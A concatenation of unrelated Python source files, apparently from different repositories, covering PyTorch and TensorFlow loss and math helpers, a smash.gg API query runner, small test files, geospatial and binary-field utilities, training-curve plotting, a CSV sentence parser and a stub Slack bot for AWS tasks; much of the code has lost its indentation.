Input: x is a BxNxd matrix
        y is an optional BxMxd matrix
Output: dist is a BxNxM matrix where dist[b,i,j] is the square norm between x[b,i,:] and y[b,j,:]
if y is not given then use 'y=x'.
i.e. dist[b,i,j] = ||x[b,i,:]-y[b,j,:]||^2
'''
B, N, d = x.size()
if self.dist_norm == 'l1':
x_norm = x.view(B, N, 1, d)
if y is not None:
y_norm = y.view(B, 1, -1, d)
else:
y_norm = x.view(B, 1, -1, d)
dist = torch.abs(x_norm - y_norm).sum(dim=3)
elif self.dist_norm == 'l2':
x_norm = (x ** 2).sum(dim=2).view(B, N, 1)
if y is not None:
M = y.size(1)
y_t = torch.transpose(y, 1, 2)
y_norm = (y ** 2).sum(dim=2).view(B, 1, M)
else:
y_t = torch.transpose(x, 1, 2)
y_norm = x_norm.view(B, 1, N)
dist = x_norm + y_norm - 2.0 * torch.bmm(x, y_t)
# Ensure diagonal is zero if x=y
if y is None:
dist = dist - torch.diag_embed(torch.diagonal(dist, dim1=-2, dim2=-1), dim1=-2, dim2=-1)
dist = torch.clamp(dist, 0.0, np.inf)
# dist = torch.sqrt(torch.clamp(dist, 0.0, np.inf) / d)
else:
raise NotImplementedError('%s norm has not been supported.' % self.dist_norm)
return dist
def forward(self, x, gt):
p1 = F.unfold(x, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
B, C, H = p1.size()
p1 = p1.permute(0, 2, 1).contiguous() # [B, H, C]
p2 = F.unfold(gt, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
p2 = p2.permute(0, 2, 1).contiguous() # [B, H, C]
gt_2 = F.interpolate(gt, scale_factor=0.5, mode='bicubic', align_corners = False)
p2_2 = F.unfold(gt_2, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
p2_2 = p2_2.permute(0, 2, 1).contiguous() # [B, H, C]
gt_4 = F.interpolate(gt, scale_factor=0.25, mode='bicubic',align_corners = False)
p2_4 = F.unfold(gt_4, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
p2_4 = p2_4.permute(0, 2, 1).contiguous() # [B, H, C]
p2_cat = torch.cat([p2, p2_2, p2_4], 1)
score1 = self.alpha * self.batch_pairwise_distance(p1, p2_cat)
score = score1 + self.beta * self.batch_pairwise_distance(p2, p2_cat) # [B, H, H]
weight, ind = torch.min(score, dim=2) # [B, H]
index = ind.unsqueeze(-1).expand([-1, -1, C]) # [B, H, C]
sel_p2 = torch.gather(p2_cat, dim=1, index=index) # [B, H, C]
loss = self.criterion(p1, sel_p2)
return loss
class PerceptualLoss(nn.Module):
"""Perceptual loss with commonly used style loss.
Args:
layer_weights (dict): The weight for each layer of vgg feature.
Here is an example: {'conv5_4': 1.}, which means the conv5_4
feature layer (before relu5_4) will be extracted with weight
            1.0 in calculating losses.
vgg_type (str): The type of vgg network used as feature extractor.
Default: 'vgg19'.
use_input_norm (bool): If True, normalize the input image in vgg.
Default: True.
        use_pcp_loss (bool): If True, the perceptual loss will be calculated
            and returned. Default: True.
        use_style_loss (bool): If True, the style loss will be calculated
            and returned. Default: True.
norm_img (bool): If True, the image will be normed to [0, 1]. Note that
            this is different from `use_input_norm`, which normalizes the input
            inside the forward function of vgg according to the dataset statistics.
Importantly, the input image must be in range [-1, 1].
Default: False.
criterion (str): Criterion used for perceptual loss. Default: 'l1'.
"""
def __init__(self,
layer_weights,
vgg_type='vgg19',
use_input_norm=True,
use_pcp_loss=True,
use_style_loss=True,
norm_img=False,
criterion='l1'):
super(PerceptualLoss, self).__init__()
self.norm_img = norm_img
self.use_pcp_loss = use_pcp_loss
self.use_style_loss = use_style_loss
self.layer_weights = layer_weights
self.vgg = VGGFeatureExtractor(
layer_name_list=list(layer_weights.keys()),
vgg_type=vgg_type,
use_input_norm=use_input_norm)
self.criterion_type = criterion
if self.criterion_type == 'l1':
self.criterion = torch.nn.L1Loss()
elif self.criterion_type == 'l2':
            self.criterion = torch.nn.MSELoss()
elif self.criterion_type == 'fro':
self.criterion = None
else:
raise NotImplementedError('%s criterion has not been supported.' % self.criterion_type)
def forward(self, x, gt):
"""Forward function.
Args:
x (Tensor): Input tensor with shape (n, c, h, w).
gt (Tensor): Ground-truth tensor with shape (n, c, h, w).
Returns:
Tensor: Forward results.
"""
if self.norm_img:
x = (x + 1.) * 0.5
gt = (gt + 1.) * 0.5
# extract vgg features
x_features = self.vgg(x)
gt_features = self.vgg(gt.detach())
# calculate perceptual loss
if self.use_pcp_loss:
percep_loss = 0
non_local_loss = None
for k in x_features.keys():
if self.criterion_type == 'fro':
percep_loss += torch.norm(
x_features[k] - gt_features[k],
p='fro') * self.layer_weights[k]
else:
percep_loss += self.criterion(x_features[k], gt_features[k]) * self.layer_weights[k]
# non_local_loss += self.non_local_criterion(x_features[k], gt_features[k]) * self.layer_weights[k] * 0.1
        else:
            percep_loss = None
            non_local_loss = None
# calculate style loss
if self.use_style_loss:
style_loss = 0
for k in x_features.keys():
if self.criterion_type == 'fro':
style_loss += torch.norm(
self._gram_mat(x_features[k]) -
self._gram_mat(gt_features[k]),
p='fro') * self.layer_weights[k]
else:
style_loss += self.criterion(self._gram_mat(x_features[k]), self._gram_mat(gt_features[k])) \
* self.layer_weights[k]
else:
style_loss = None
return percep_loss, style_loss,non_local_loss
def _gram_mat(self, x):
"""Calculate Gram matrix.
Args:
x (torch.Tensor): Tensor with shape of (n, c, h, w).
Returns:
torch.Tensor: Gram matrix.
"""
n, c, h, w = x.size()
features = x.view(n, c, w * h)
features_t = features.transpose(1, 2)
gram = features.bmm(features_t) / (c * h * w)
return gram
class AdversarialLoss(nn.Module):
def __init__(self, gan_type='vanilla', real_label_val=1.0, fake_label_val=0.0):
"""
Args:
gan_type (str): Support 'vanilla', 'lsgan', 'wgan', 'hinge'.
real_label_val (float): The value for real label. Default: 1.0.
fake_label_val (float): The value for fake label. Default: 0.0.
"""
super(AdversarialLoss, self).__init__()
self.gan_type = gan_type
self.real_label_val = real_label_val
self.fake_label_val = fake_label_val
if self.gan_type == 'vanilla':
self.loss = nn.BCEWithLogitsLoss()
elif self.gan_type == 'lsgan':
self.loss = nn.MSELoss()
elif self.gan_type == 'wgan':
self.loss = self._wgan_loss
elif self.gan_type == 'wgan_softplus':
self.loss = self._wgan_softplus_loss
elif self.gan_type == 'hinge':
self.loss = nn.ReLU()
else:
raise NotImplementedError('GAN type %s is not implemented.' % self.gan_type)
def _wgan_loss(self, input, target):
"""
Args:
input (Tensor): Input tensor.
target (bool): Target label.
"""
return -input.mean() if target else input.mean()
def _wgan_softplus_loss(self, input, target):
"""wgan loss with soft plus. softplus is a smooth approximation to the ReLU function.
In StyleGAN2, it is called:
Logistic loss for discriminator;
Non-saturating loss for generator.
Args:
input (Tensor): Input tensor.
target (bool): Target label.
"""
return F.softplus(-input).mean() if target else F.softplus(input).mean()
def get_target_label(self, input, target_is_real):
"""Get target label.
Args:
input (Tensor): Input tensor.
target_is_real (bool): Whether the target is real or fake.
Returns:
(bool | Tensor): Target tensor. Return bool for wgan, otherwise, return Tensor.
"""
if self.gan_type in ['wgan', 'wgan_softplus']:
return target_is_real
target_val = (self.real_label_val if target_is_real else self.fake_label_val)
return input.new_ones(input.size()) * target_val
def forward(self, input, target_is_real, is_disc=False):
"""
Args:
input (Tensor): The input for the loss module, i.e., the network
prediction.
            target_is_real (bool): Whether the target is real or fake.
is_disc (bool): Whether the loss for discriminators or not.
Default: False.
Returns:
Tensor: GAN loss value.
"""
target_label = self.get_target_label(input, target_is_real)
if self.gan_type == 'hinge':
if is_disc:
input = -input if target_is_real else input
loss = self.loss(1 + input).mean()
else:
loss = -input.mean()
else: # other gan types
loss = self.loss(input, target_label)
return loss
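# --- Illustration ----------------------------------------------------------
# A quick smoke test of the simpler losses above on random tensors (the
# perceptual loss needs VGG weights, so it is left out). Shapes are arbitrary.
def _loss_smoke_test():
    out = torch.rand(2, 3, 32, 32)
    gt = torch.rand(2, 3, 32, 32)
    tv = TVLoss(weight=0.5)(out, gt)
    charb = CharbonnierLoss(eps=1e-6)(out, gt)
    adv = AdversarialLoss(gan_type='lsgan')(torch.randn(2, 1), target_is_real=True)
    return tv.item(), charb.item(), adv.item()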
|
104118
|
import tensorflow as tf
import numpy as np
PROJ_EPS = 1e-5
EPS = 1e-15
MAX_TANH_ARG = 15.0
# Real x, not vector!
def tf_atanh(x):
return tf.atanh(tf.minimum(x, 1. - EPS)) # Only works for positive real x.
# Real x, not vector!
def tf_tanh(x):
return tf.tanh(tf.minimum(tf.maximum(x, -MAX_TANH_ARG), MAX_TANH_ARG))
def tf_dot(x, y):
return tf.reduce_sum(x * y, axis=1, keepdims=True)
def tf_norm(x):
return tf.norm(x, ord=2, axis=-1, keepdims=True)
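# --- Illustration ----------------------------------------------------------
# A small check of the clipping helpers, assuming eager execution (TF 2.x):
# tf_atanh never sees an argument above 1 - EPS, and tf_tanh clamps its
# argument to [-MAX_TANH_ARG, MAX_TANH_ARG] before applying tanh.
def _clip_check():
    safe = tf_atanh(tf.constant([0.0, 0.5, 0.9]))
    bounded = tf_tanh(tf.constant([-100.0, 0.0, 100.0]))
    return safe, bounded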
|
104124
|
import time
import requests
from pysmashgg.exceptions import *
# Runs queries
def run_query(query, variables, header, auto_retry):
# This helper function is necessary for TooManyRequestsErrors
def _run_query(query, variables, header, auto_retry, seconds):
json_request = {'query': query, 'variables': variables}
try:
request = requests.post(url='https://api.smash.gg/gql/alpha', json=json_request, headers=header)
if request.status_code == 400:
raise RequestError
elif request.status_code == 429:
raise TooManyRequestsError
elif 400 <= request.status_code < 500:
raise ResponseError
elif 500 <= request.status_code < 600:
raise ServerError
elif 300 <= request.status_code < 400:
raise NoIdeaError
response = request.json()
return response
except RequestError:
print("Error 400: Bad request (probably means your key is wrong)")
return
except TooManyRequestsError:
if auto_retry:
print("Error 429: Sending too many requests right now, trying again in {} seconds".format(seconds))
time.sleep(seconds)
return _run_query(query, variables, header, auto_retry, seconds*2)
else:
print("Error 429: Sending too many requests right now")
return
except ResponseError:
print("Error {}: Unknown request error".format(request.status_code))
return
except ServerError:
print("Error {}: Unknown server error".format(request.status_code))
return
except NoIdeaError:
print("Error {}: I literally have no idea how you got this status code, please send this to me".format(request.status_code))
return
return _run_query(query, variables, header, auto_retry, 10)
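# --- Illustration ----------------------------------------------------------
# A sketch of calling run_query. The token is a placeholder and the GraphQL
# query is only illustrative; auto_retry=True turns on the doubling back-off
# above (10s, 20s, 40s, ...) whenever the API answers with 429.
def _example_query(token="YOUR_API_TOKEN"):
    query = "query ($slug: String) { tournament(slug: $slug) { id name } }"
    variables = {"slug": "some-tournament-slug"}
    header = {"Authorization": "Bearer " + token}
    return run_query(query, variables, header, auto_retry=True)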
|
104125
|
from ctypes import POINTER, c_char_p, byref
from ...ffi import utils
from ...ffi.ontology.facades import CTtsFacade
from ...ffi.utils import hermes_protocol_handler_tts_facade, hermes_drop_tts_facade
class TtsFFI(object):
def __init__(self, use_json_api=True):
self.use_json_api = use_json_api
self._facade = POINTER(CTtsFacade)()
def initialize_facade(self, protocol_handler):
hermes_protocol_handler_tts_facade(protocol_handler, byref(self._facade))
def release_facade(self):
hermes_drop_tts_facade(self._facade)
self._facade = POINTER(CTtsFacade)()
def _call_foreign_function(self, foreign_function_name, function_argument):
if self.use_json_api:
foreign_function_name = foreign_function_name + "_json"
a_json_string = str(function_argument) # function_argument should be a dict.
ptr_to_foreign_function_argument = c_char_p(a_json_string.encode('utf-8'))
else:
function_argument = function_argument.into_c_repr()
ptr_to_foreign_function_argument = byref(function_argument)
getattr(utils, foreign_function_name)(
self._facade,
ptr_to_foreign_function_argument
)
def publish_register_sound(self, message):
self._call_foreign_function(
'hermes_tts_publish_register_sound',
message
)
return self
|
104137
|
from click.testing import CliRunner
from modelindex.commands.cli import cli
def test_cli_invocation():
runner = CliRunner()
result = runner.invoke(cli)
assert result.exit_code == 0
def test_cli_check_ok():
runner = CliRunner()
result = runner.invoke(cli, ["check", "tests/test-mi/11_markdown/rexnet.md"])
assert result.exit_code == 0
assert "Checking" in result.output
assert "All good" in result.output
def test_cli_check_fail():
runner = CliRunner()
result = runner.invoke(cli, ["check", "tests/test-mi/01_base"])
assert result.exit_code == 0
assert "Path to README file docs/inception-v3-readme.md is not a valid file" in result.output
|
104139
|
import torch
import torch.nn as nn
from models.utils import parse_model_params, get_params_str
from models.utils import sample_gauss, nll_gauss
class RNN_GAUSS(nn.Module):
"""RNN with Gaussian output distribution."""
def __init__(self, params, parser=None):
super().__init__()
self.model_args = ['x_dim', 'y_dim', 'h_dim', 'rnn_dim', 'n_layers']
self.params = parse_model_params(self.model_args, params, parser)
self.params_str = get_params_str(self.model_args, params)
x_dim = params['x_dim']
y_dim = params['y_dim']
h_dim = params['h_dim']
rnn_dim = params['rnn_dim']
n_layers = params['n_layers']
self.dec = nn.Sequential(
nn.Linear(rnn_dim, h_dim),
nn.ReLU(),
nn.Linear(h_dim, h_dim),
nn.ReLU())
self.dec_mean = nn.Linear(h_dim, y_dim)
self.dec_std = nn.Sequential(
nn.Linear(h_dim, y_dim),
nn.Softplus())
self.rnn = nn.GRU(y_dim, rnn_dim, n_layers)
def forward(self, states, macro=None, hp=None):
out = {}
out['nll'] = 0
h = torch.zeros(self.params['n_layers'], states.size(1), self.params['rnn_dim'])
if self.params['cuda']:
h = h.cuda()
for t in range(states.size(0)):
y_t = states[t].clone()
dec_t = self.dec(torch.cat([h[-1]], 1))
dec_mean_t = self.dec_mean(dec_t)
dec_std_t = self.dec_std(dec_t)
_, h = self.rnn(y_t.unsqueeze(0), h)
out['nll'] += nll_gauss(dec_mean_t, dec_std_t, y_t)
return out
def sample(self, states, macro=None, burn_in=0):
h = torch.zeros(self.params['n_layers'], states.size(1), self.params['rnn_dim'])
for t in range(states.size(0)):
dec_t = self.dec(torch.cat([h[-1]], 1))
dec_mean_t = self.dec_mean(dec_t)
dec_std_t = self.dec_std(dec_t)
if t >= burn_in:
states[t] = sample_gauss(dec_mean_t, dec_std_t)
_, h = self.rnn(states[t].unsqueeze(0), h)
return states, None
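# --- Illustration ----------------------------------------------------------
# nll_gauss and sample_gauss come from models.utils and are not shown here.
# A common diagonal-Gaussian version looks like the sketch below; this is an
# assumption about their behaviour, not necessarily the repo's implementation.
import math

def _nll_gauss_sketch(mean, std, x, eps=1e-6):
    # negative log-likelihood of x under N(mean, diag(std^2)), summed over dims
    var = std ** 2 + eps
    return torch.sum(0.5 * torch.log(2 * math.pi * var) + (x - mean) ** 2 / (2 * var))

def _sample_gauss_sketch(mean, std):
    return mean + std * torch.randn_like(std)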
|
104169
|
import numpy as np
from numpy.linalg import inv
class GeoArray(np.ndarray):
def __new__(cls, input_array, crs=4326, mat=None):
obj = np.asarray(input_array).view(cls)
obj.crs, obj.mat = crs, mat.reshape((2,3))
return obj
def __array_finalize__(self, obj):
if obj is None: return
self.crs = getattr(obj, 'crs', '')
self.mat = getattr(obj, 'mat', None)
def __getitem__(self, item):
sliced = True & isinstance(item, tuple)
if sliced:
sliced &= len(item) in (2, 3)
sliced &= isinstance(item[1], slice)
sliced &= isinstance(item[0], slice)
def gs(s): return (s.start or 0, s.step or 1)
if sliced:
(s1,d1), (s2,d2) = gs(item[0]), gs(item[1])
obj = super(GeoArray, self).__getitem__(item)
if not obj.mat is None:
m, offset = obj.mat[:,1:], obj.mat[:,:1]
o = np.dot(m, [[s2],[s1]]) + offset
t = m * [d2, d1]
obj.mat = np.hstack((o,t))
return obj
if not sliced:
return super().__getitem__(item).__array__()
def __array_wrap__(self, out_arr, context=None):
if out_arr.shape[:2] != self.shape[:2]:
out_arr = out_arr.__array__()
return out_arr
@property
def imat(self):
imat = np.vstack((self.mat[:,[1,2,0]], [[0,0,1]]))
return np.linalg.inv(imat)[:2,[2,0,1]]
@property
def imat1(self): return self.imat.ravel()[[1,2,4,5,0,3]]
def project(self, x, y):
x += 0.5; y += 0.5
m, offset = self.mat[:,1:], self.mat[:,:1]
xy = np.array([x, y]).reshape((2,-1))
return np.dot(m, xy) + offset
def invpro(self, e, n):
m, offset = self.mat[:,1:], self.mat[:,:1]
en = np.array([e, n]).reshape((2,-1))
return np.dot(inv(m), en - offset) - 0.5
def channels(self, n=None):
if n is None:
return 1 if self.ndim==2 else self.shape[2]
else:
return self if self.ndim==2 else self[:,:,n]
def lookup(self, lut):
return GeoArray(lut[self], self.crs, self.mat)
def getbox(self):
return (self.shape[:2], self.crs, self.mat)
def frombox(shp, crs, mat, chan=1, dtype=np.uint8):
if chan>1: shp += (chan,)
return GeoArray(np.zeros(shp, dtype=dtype), crs, mat)
def geoarray(arr, crs=None, mat=np.array([[1,1,0],[1,0,1]])):
return GeoArray(arr, crs, mat)
if __name__ == '__main__':
prj = np.array([0,1,0, 0,0,1])
a = GeoArray(np.ones((5,5)), crs=4326, mat=prj)
print(a.crs)
print(a.mat)
b = a+1
print(a.crs)
print(a.mat)
c = a[1::2,1::2]
print(c.crs)
print(c.mat)
|
104182
|
import struct
from suitcase.fields import BaseField
from suitcase.fields import BaseStructField
from suitcase.fields import BaseFixedByteSequence
class SLFloat32(BaseStructField):
"""Signed Little Endian 32-bit float field."""
PACK_FORMAT = UNPACK_FORMAT = b"<f"
def unpack(self, data, **kwargs):
self._value = struct.unpack(self.UNPACK_FORMAT, data)[0]
class UBInt32Sequence(BaseFixedByteSequence):
"""A sequence of unsigned, big-endian 32 bit integers.
:param length: Number of 32-bit integers in sequence.
:type length: Integer
"""
def __init__(self, length, **kwargs):
super().__init__(lambda l: ">" + "I" * l, length, **kwargs)
self.bytes_required = length * 4
class FixedLengthString(BaseField):
"""A string of a fixed number of bytes.
The specified number of bytes are read and then any null
bytes are stripped from the result.
:param length: Number of bytes to read.
:type length: Integer
"""
def __init__(self, length, **kwargs):
super().__init__(**kwargs)
self.length = length
@property
def bytes_required(self):
"""Number of bytes to read from stream."""
return self.length
def pack(self, stream):
stream.write(self._value.strip(b'\0'))
def unpack(self, data):
self._value = data.strip(b'\0')
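# --- Illustration ----------------------------------------------------------
# A quick struct-level check of the "<f" format used by SLFloat32: packing and
# unpacking a little-endian 32-bit float round-trips (within float32 precision).
def _float32_roundtrip(value=1.5):
    raw = struct.pack(b"<f", value)      # 4 bytes, little-endian
    return struct.unpack(b"<f", raw)[0]  # -> 1.5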
|
104197
|
import numpy as np
from matplotlib import pyplot as plt
'''
Function for plotting training and validation curves.
'''
def learning_curves(history, multival=None, model_n=None, filepath=None, plot_from_epoch=0, plot_to_epoch=None):
n = len(history)
num_epochs = len(history[0]['loss'])
if plot_to_epoch is None:
plot_to_epoch = num_epochs
IoU_in_history = 'mIoU' in history[0].keys()
train_loss = np.zeros((n, num_epochs))
train_acc = np.zeros_like(train_loss)
val_loss = np.zeros_like(train_loss)
val_acc = np.zeros_like(train_loss)
if IoU_in_history:
train_mIoU = np.zeros_like(train_loss)
val_mIoU = np.zeros_like(train_loss)
# For the additional validation curves, which are at different scales
if multival is not None:
m = len(multival[0]['val_loss']) // num_epochs
val_loss_scales = np.zeros((n, num_epochs*m))
val_acc_scales = np.zeros_like(val_loss_scales)
for i in range(len(history)):
train_loss[i, :] = history[i]['loss']
train_acc[i, :] = history[i]['acc']
val_loss[i, :] = history[i]['val_loss']
val_acc[i, :] = history[i]['val_acc']
if IoU_in_history:
train_mIoU[i, :] = history[i]['mIoU']
val_mIoU[i, :] = history[i]['val_mIoU']
if multival is not None:
val_loss_scales[i, :] = multival[i]['val_loss']
val_acc_scales[i, :] = multival[i]['val_acc']
# Extracting mean values and standard deviations
mean_train_loss = np.mean(train_loss, 0)
std_train_loss = np.std(train_loss, 0, ddof=1)
mean_train_acc = np.mean(train_acc, 0)
std_train_acc = np.std(train_acc, 0, ddof=1)
mean_val_loss = np.mean(val_loss, 0)
std_val_loss = np.std(val_loss, 0, ddof=1)
mean_val_acc = np.mean(val_acc, 0)
std_val_acc = np.std(val_acc, 0, ddof=1)
if IoU_in_history:
mean_train_mIoU = np.mean(train_mIoU, 0)
std_train_mIoU = np.std(train_mIoU, 0, ddof=1)
mean_val_mIoU = np.mean(val_mIoU, 0)
std_val_mIoU = np.std(val_mIoU, 0, ddof=1)
# Third dimension corresponds to scales
if multival is not None:
val_loss_scales = np.reshape(val_loss_scales, [n, num_epochs, m])
val_acc_scales = np.reshape(val_acc_scales, [n, num_epochs, m])
mean_val_loss_scales, mean_val_acc_scales = np.mean(val_loss_scales, axis=0), np.mean(val_acc_scales, axis=0)
std_val_loss_scales, std_val_acc_scales = np.std(val_loss_scales, axis=0, ddof=1), np.std(val_acc_scales, axis=0, ddof=1)
# if n == 0:
# std_train_loss = 0
# std_train_acc = 0
# std_val_loss = 0
# std_val_acc = 0
# std_val_loss_scales = 0
# std_val_acc_scales = 0
# else:
# std_train_loss = np.std(train_loss, 0, ddof=1)
# std_train_acc = np.std(train_acc, 0, ddof=1)
# std_val_loss = np.std(val_loss, 0, ddof=1)
# std_val_acc = np.std(val_acc, 0, ddof=1)
# std_val_loss_scales = np.std(val_loss_scales, axis=0, ddof=1)
# std_val_acc_scales = np.std(val_acc_scales, axis=0, ddof=1)
if filepath is not None:
plt.ioff()
# Plotting mean Loss curves with stds
plt.figure(figsize=(10, 10))
plt.title(model_n + '_loss')
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_train_loss[plot_from_epoch:plot_to_epoch], color="g", label='training')
plt.fill_between(np.arange(plot_to_epoch - plot_from_epoch), mean_train_loss[plot_from_epoch:plot_to_epoch] - std_train_loss[plot_from_epoch:plot_to_epoch],
mean_train_loss[plot_from_epoch:plot_to_epoch] + std_train_loss[plot_from_epoch:plot_to_epoch], alpha=0.2, color="g")
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_loss[plot_from_epoch:plot_to_epoch], color='r', label='validation')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), mean_val_loss[plot_from_epoch:plot_to_epoch] - std_val_loss[plot_from_epoch:plot_to_epoch],
mean_val_loss[plot_from_epoch:plot_to_epoch] + std_val_loss[plot_from_epoch:plot_to_epoch], alpha=0.2, color='r')
if multival is not None:
for i in range(m):
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_loss_scales[plot_from_epoch:plot_to_epoch, i], label=f'validation_{i+1}')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), mean_val_loss_scales[plot_from_epoch:plot_to_epoch, i] - std_val_loss_scales[plot_from_epoch:plot_to_epoch, i],
mean_val_loss_scales[plot_from_epoch:plot_to_epoch, i] + std_val_loss_scales[plot_from_epoch:plot_to_epoch, i], alpha=0.2, )
plt.xlabel("Epoch number")
plt.ylabel("Loss")
plt.legend()
if filepath is not None:
plt.savefig(filepath + model_n + '_loss' + '.png')
# Plotting mean Accuracy curves with stds
plt.figure(figsize=(10, 10))
plt.title(model_n + '_acc')
plt.ylim(0, 1.05)
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_train_acc[plot_from_epoch:plot_to_epoch], color="g", label='training')
plt.fill_between(np.arange(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_train_acc[plot_from_epoch:plot_to_epoch] - std_train_acc[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_train_acc[plot_from_epoch:plot_to_epoch] + std_train_acc[plot_from_epoch:plot_to_epoch]), alpha=0.2, color="g")
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_acc[plot_from_epoch:plot_to_epoch], color='r', label='validation')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_val_acc[plot_from_epoch:plot_to_epoch] - std_val_acc[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_val_acc[plot_from_epoch:plot_to_epoch] + std_val_acc[plot_from_epoch:plot_to_epoch]), alpha=0.2, color='r')
if multival is not None:
for i in range(m):
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_acc_scales[plot_from_epoch:plot_to_epoch, i], label=f'validation_{i+1}')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_val_acc_scales[plot_from_epoch:plot_to_epoch, i] - std_val_acc_scales[plot_from_epoch:plot_to_epoch, i]),
np.minimum(1, mean_val_acc_scales[plot_from_epoch:plot_to_epoch, i] + std_val_acc_scales[plot_from_epoch:plot_to_epoch, i]), alpha=0.2)
plt.xlabel("Epoch number")
plt.ylabel("Accuracy")
plt.legend()
if filepath is not None:
plt.savefig(filepath + model_n + '_acc' + '.png')
if IoU_in_history:
plt.figure(figsize=(10, 10))
plt.title(model_n + '_mIoU')
plt.ylim(0, 1.05)
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_train_mIoU[plot_from_epoch:plot_to_epoch], color="g",
label='training')
plt.fill_between(np.arange(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_train_mIoU[plot_from_epoch:plot_to_epoch] - std_train_mIoU[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_train_mIoU[plot_from_epoch:plot_to_epoch] + std_train_mIoU[plot_from_epoch:plot_to_epoch]),
alpha=0.2, color="g")
plt.plot(range(plot_to_epoch - plot_from_epoch), mean_val_mIoU[plot_from_epoch:plot_to_epoch], color='r',
label='validation')
plt.fill_between(range(plot_to_epoch - plot_from_epoch), np.maximum(0, mean_val_mIoU[plot_from_epoch:plot_to_epoch] - std_val_mIoU[plot_from_epoch:plot_to_epoch]),
np.minimum(1, mean_val_mIoU[plot_from_epoch:plot_to_epoch] + std_val_mIoU[plot_from_epoch:plot_to_epoch]),
alpha=0.2, color='r')
plt.xlabel("Epoch number")
plt.ylabel("mIoU")
plt.legend()
if filepath is not None:
if IoU_in_history:
plt.savefig(filepath + model_n + '_mIoU' + '.png')
else:
plt.show()
plt.close('all')
return mean_train_loss, std_train_loss, mean_train_acc, std_train_acc, mean_val_loss, std_val_loss, mean_val_acc, std_val_acc
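# --- Illustration ----------------------------------------------------------
# A minimal call with a synthetic history: two runs (the ddof=1 std needs at
# least two samples) and only the keys the function actually reads. Numbers
# are made up.
def _learning_curves_example():
    def fake_run(offset):
        e = np.arange(5, dtype=float)
        return {'loss': list(2.0 - 0.3 * e + offset),
                'acc': list(0.5 + 0.08 * e),
                'val_loss': list(2.2 - 0.25 * e + offset),
                'val_acc': list(0.45 + 0.07 * e)}
    history = [fake_run(0.0), fake_run(0.1)]
    return learning_curves(history, model_n='demo', filepath=None)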
|
104223
|
from kaishi.image.util import validate_image_header
def test_validate_image_header():
invalid_file = "tests/data/image/empty_unsupported_extension.gif"
valid_file = "tests/data/image/sample.jpg"
assert validate_image_header(invalid_file) is False
assert validate_image_header(valid_file) is True
|
104232
|
import pytest
import schedule
from orchestrator.cli.scheduler import run
from orchestrator.schedules import ALL_SCHEDULERS
from orchestrator.schedules.scheduling import scheduler
def test_scheduling_with_period(capsys, monkeypatch):
ref = {"called": False}
@scheduler(name="test", time_unit="second", period=1)
def test_scheduler():
ref["called"] = True
print("I've run") # noqa: T001
return schedule.CancelJob
ALL_SCHEDULERS.clear()
ALL_SCHEDULERS.append(test_scheduler)
# Avoid having to mock next_run() and idle_seconds() deep in the scheduler as we are only interested in the job:
with pytest.raises(TypeError):
run()
captured = capsys.readouterr()
assert captured.out == "I've run\n"
assert ref["called"]
|
104261
|
from src.utilities.app_context import LOG_WITHOUT_CONTEXT
from anuvaad_auditor.loghandler import log_info, log_exception
import csv
import uuid
class ParseCSV (object):
def __init__(self):
pass
def get_parallel_sentences(filename, source_language, target_language, skip_header=True):
parallel_sentences = []
log_info("parsing parallel sentence from file %s" % (filename), LOG_WITHOUT_CONTEXT)
with open(filename) as csv_file:
reader = csv.reader(csv_file, delimiter=',')
rows = []
for row in reader:
rows.append(row)
if skip_header == True:
rows = rows[1:]
if len(rows)==0:
log_info("no sentences found on %s" % (filename), LOG_WITHOUT_CONTEXT)
return []
for row in rows:
source_sentence = {}
target_sentence = {}
source_sentence['language'] = source_language
source_sentence['id'] = str(uuid.uuid4())
source_sentence['text'] = row[0]
target_sentence['language'] = target_language
target_sentence['id'] = str(uuid.uuid4())
target_sentence['text'] = row[1]
parallel_sentences.append({
'annotationId': str(uuid.uuid4()),
'source': source_sentence,
'target': target_sentence
})
return parallel_sentences
|
104275
|
def variable_argument( var1, *vari):
print "Out-put is",var1
for var in vari:
print var
variable_argument(60)
variable_argument(100,90,40,50,60)
|
104310
|
import os, time
from slackclient import SlackClient
from pyslack import SlackClient as slackclient
client = slackclient(os.environ.get('SLACK_BOT_TOKEN'))
BOT_NAME = 'aws_bot'
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# starterbot's ID as an environment variable
# BOT_ID = os.environ.get("BOT_ID")
def chk_cmd(cmd):
'''
if command is not in the dictionary of known commands then post msg indicating unknown cmd
:param cmd:
:return:
'''
if 'hi' in cmd: return "Hi"
else: return "That command was not found"
# if True: return command + " Found"
def handle_command(command, channel):
"""
Receives commands directed at the bot and determines if they
are valid commands. If so, then acts on the commands. If not,
returns back what it needs for clarification.
"""
response = chk_cmd(command)
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
response = "Not sure what you mean. Use the *" + EXAMPLE_COMMAND + \
"* command with numbers, delimited by spaces."
if command.startswith(EXAMPLE_COMMAND):
response = "Sure...write some more code then I can do that!"
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
elif command.startswith('help') or command.startswith('\h'):
response = '@aws_bot <command> <arguments_or_options>' + "\n" \
'\h, help provides this help screen' + "\n" \
'do executes an aws commandlet' + "\n"
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
# aws functions to perform specific functions
def checkKeyAge():
pass
def checkPassAge():
pass
def checkLastLogin():
pass
def createInstance():
pass
def listInstances(keypair):
pass
def shutdownInstances(keypair):
pass
def createCluster(clusterName):
'''
    receives an expected name and orchestrates the creation / startup of a cluster
:param clusterName:
:return:
'''
pass
def checkMyAccount():
